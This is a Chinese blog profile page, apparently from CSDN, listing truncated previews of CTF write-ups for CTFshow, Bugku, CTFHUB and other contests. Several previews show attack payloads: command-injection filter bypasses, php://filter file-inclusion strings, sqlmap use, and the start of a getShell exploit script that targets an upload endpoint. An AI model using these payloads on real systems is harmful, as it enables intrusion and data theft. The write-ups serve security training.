自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(21)
  • 收藏
  • 关注

原创 CTFshow_终极考核_EXP

EXP ALL IN HEREexp exp exp ヾ(・ω・`。)import requestsimport base64import reimport timedef getShell(url): burp0_url = url + "system36d/users.php?action=upload" burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "Us

2022-01-05 20:54:36 965

原创 CTFshow_终极考核_个人WP

CTFshow_终极考核参考不打算参考0x00 web640flag_640=ctfshow{060ae7a27d203604baeb125f939570ef}这里就陆陆续续记录些杂乱的做题笔记吧做之前提醒自己信息收集后果必有前因640前端发现可疑路径 system36dPHP/7.3.22 nginx/1.21.1][10:52:15] 200 - 43B - /.bowerrc[10:53:35] 200 - 34B - /.gitign

2022-01-05 20:48:41 5542

原创 CISCN2021_华南初赛_记录

easy_sqlhint:一个简单的sql注入题目打开一个登录框,随便测试下,发现报错了直接报错注入Payload打一波失败,回显no,开始跑字典过滤了 column和可以获取表名的表如:[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-pQ9yJBow-1621160008407)(image/国赛.image/image-20210515151503088.png)]尝试盲猜表名【后面发现sqlmap爆破表名也可以跑出来】最后成功两个 users,fla

2021-05-16 20:05:54 1177 3

原创 红帽杯2021_web_部分

find_it首页没发现东西,尝试robots.txt发现 1ndexx.php但无法访问 1ndexx.php尝试继续找信息泄露,最后找到 .1ndexx.php.swp<?php $link = mysql_connect('localhost', 'root'); ?><html><head> <title>Hello worldd!</title> <style> body { background-co

2021-05-10 09:00:47 1258 14

原创 CTFshow_web入门_命令执行

0x00 web29只过滤flag?c=system('ls');?c=system('cat `ls`');预期解:echo `nl fl''ag.php`;0x01 web30if(!preg_match("/flag|system|php/i", $c)){过滤了文件名、一个系统命令执行函数、php?c=passthru('ls');?c=passthru("nl fl''ag.ph''p");预期解:echo `nl fl''ag.p''hp`;0x02 web31

2021-04-30 18:38:41 427 2

原创 CTFshow_反序列化_web276

web276 phar反序列化对phar的利用当时学的时候是半知半解,导致写这题花了好久,又无wp,最后然后尝试用单步调试解决了<?phphighlight_file(__FILE__);class filter{ public $filename; public $filecontent; public $evilfile=false; public $admin = false; public function __construct($f,$f

2021-04-28 09:40:08 766 1

原创 CTFshow_web入门_文件包含

文件包含文章目录文件包含0x00 web780x01 web790x02 web800x03 web810x04 web820x05 web830x06 web840x07 web850x08 web860x09 web870x0A web880x0B web1160x0C web1170x00 web78if(isset($_GET['file'])){ $file = $_GET['file']; include($file);无过滤?file=php://filter/

2021-03-09 10:51:11 876 1

原创 ctfshow 群友挑战 CTFshow福利抽奖

打开即可看见flag【域名后面不能有路径,如https://www.baidu.com/】然后去提交flag,可以清楚的发现没有提交flag的框**!!!**然后,憨憨的我跑去环境中找,看看有没有后台啥的再然后,我发现我是憨憨,没有提交框就自己写个呗。。。如下,简简单单的Python脚本:import requestsurl='https://ctf.show/api/v1/challenges/attempt'data='{"challenge_id":"1089","submissi.

2021-03-05 20:14:54 1027 1

原创 攻防世界 web高手进阶区 0x00-0x18

0x01 baby_webhint:想想初始页面是哪个打开发现在首页在1.php按照提示去index.php,抓包。getflag0x02 Training-WWW-Robots按题意直接访问robots.txtgetFlag0x03 Web_python_template_injection31访问显示python template injection好家伙,当场不会payload: ctf{f22b6844-5169-4054-b2a0-d95b9361cb

2021-02-26 22:34:57 969 1

原创 CTFshow_web入门_命令执行_web29~54

0x00 web29if(!preg_match("/flag/i", $c)){只过滤flag【不区分大小写】?c=system('ls');?c=system('cat `ls`');预期解:echo `nl fl''ag.php`;0x01 web30if(!preg_match("/flag|system|php/i", $c)){过滤了文件名、一个系统命令执行函数、php【不区分大小写】?c=passthru('ls');?c=passthru("nl fl''ag.

2021-02-07 20:22:05 1626 2

原创 CTFshow_web入门_爆破

0x01 web21参考链接:tomcat 认证爆破之custom iterator使用burpsuite大致步骤:①抓包发送至intruder②base64解码Authorization: Basic YWRtaW46YWFhYQ===》Authorization: Basic admin:aaaa③添加为payload§YWRtaW46YWFhYQ==§,payload type设置为custom iterator【自定义迭代器】④position 1中输入admin,position 2

2021-01-24 14:15:24 366

原创 CTFshow_web入门_信息搜集

https://blog.csdn.net/qq_44893894/article/details/1093805290x00 web1payload:查看源代码0x01 web2<script type="text/javascript"> window.oncontextmenu = function(){return false}; window.onselectstart = function(){return false}; window.onkeydown = func

2021-01-20 21:20:13 259

原创 Bugku_web31-34

0x01 web31扫描得robots.txt,访问得resusl.php关键代码:if ($_GET[x]==$password) 此处省略1w字这里被坑了,试了好久,还以为有啥其他新姿势,密码居然是admin!payload:/resusl.php?x=admin0x02 web32没上传成功,看评论区才成功payload:①大写绕过请求头中的Content-Type: Multipart②修改请求报文中的Content-Type: image/png③修改 后缀名php4原因

2021-01-05 17:23:56 471

原创 Bugku_web16-30

0x01 web16扫描得index.php.bak关键代码+我的注释如下include_once "flag.php";ini_set("display_errors", 0);//不报错$str = strstr($_SERVER['REQUEST_URI'], '?');//从?开始截取URL$str = substr($str,1);//剔除?$str = str_replace('key','',$str);//替换key为空,双写绕过即可parse_str($str);//把

2021-01-05 13:08:48 225

原创 Bugku_web1-15

0x01 web1payload:F120x02 web2payload:F12->Elements->右键修改为maxlength="2"0x03 web3payload:http://114.67.246.176:12552/?what=flag0x04 web4payload:以post方式传参0x05 web5payload:?num=1a0x06 web6站长工具中Unicode转ASCII&#102;0x01 web7抓包,重复发送,有一个就是fl

2021-01-04 20:35:40 177

原创 CTFshow_萌新计划_web1-21

0x01 web1关键代码:if(isset($_GET['id'])){ $id = $_GET['id']; # 判断id的值是否大于999 if(intval($id) > 999){ # id 大于 999 直接退出并返回错误 die("id error"); }else{ # id 小于 999 拼接sql语句 $sql = "select * from article where id

2021-01-04 17:09:40 3436 2

原创 ctfshow_萌新_萌新隐藏题

https://harvey-blog.com/Safety/5250x01 萌新认证加群召唤flag0x02 萌新_密码萌新不会53316C6B5A6A42684D3256695A44566A4E47526A4D5459774C5556375A6D49324D32566C4D4449354F4749345A6A526B4F48303D看见没有大于F的字符,尝试16进制写Python脚本,每2位16进制转文本import renumber = '53316C6B5A6A42684D3

2021-01-03 20:34:10 3273

原创 ACTF2020 新生赛

0x01 Include源代码中发现文件包含payload:?file=php://filter/read=convert.base64-encode/resource=flag.php得到PD9waHAKZWNobyAiQ2FuIHlvdSBmaW5kIG91dCB0aGUgZmxhZz8iOwovL2ZsYWd7NThkODk3MTItYjVjNC00OWQwLWE1ZDgtOGZiYTk2YmZjNmI0fQo=解base64:<?phpecho "Can you find

2021-01-03 16:17:12 415

原创 CTFHUB技能树之Web

webweb前置技能参考链接-操作系统-数据库-HTML/CSS-程序语言HTTP协议0x01 请求方式1)HTTP Method 是可以自定义的,并且区分大小写可以通过抓包更改其HTTP的方法2)kali系统中的curl命令实现抓包(curl支持几乎所有操作系统)常用命令:-v是详细信息 -X是指定请求方法curl参考一 curl参考二0x02 302跳转关于302的题:burpsite默认不重定向使用curl命令,该命令中只有加了**-L**才重定向相

2020-12-28 11:30:54 2574

原创 CTFHUB(六)之整数型注入

直接跑sqlmapsqlmap -u http://challenge-d2092f951b60f48a.sandbox.ctfhub.com:10080/?id=1看到可注入sqlmap -u http://challenge-d2092f951b60f48a.sandbox.ctfhub.com:10080/?id=1 --dbs下意识选了sqlisqlmap -u http://...

2020-03-03 20:33:05 234

原创 CTFHUB学习记录(四)

web之前置技能HTTP协议之基础认证题目给了相关链接:https://zh.wikipedia.org/wiki/超文本传输协议(墙)https://zh.wikipedia.org/wiki/HTTP基本认证浏览后找到关键点:1、用户名和密码是由base64加密,在Authorization中2、WWW-Authenticate: Basic realm="Secure Are...

2020-03-03 16:57:12 372 1

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除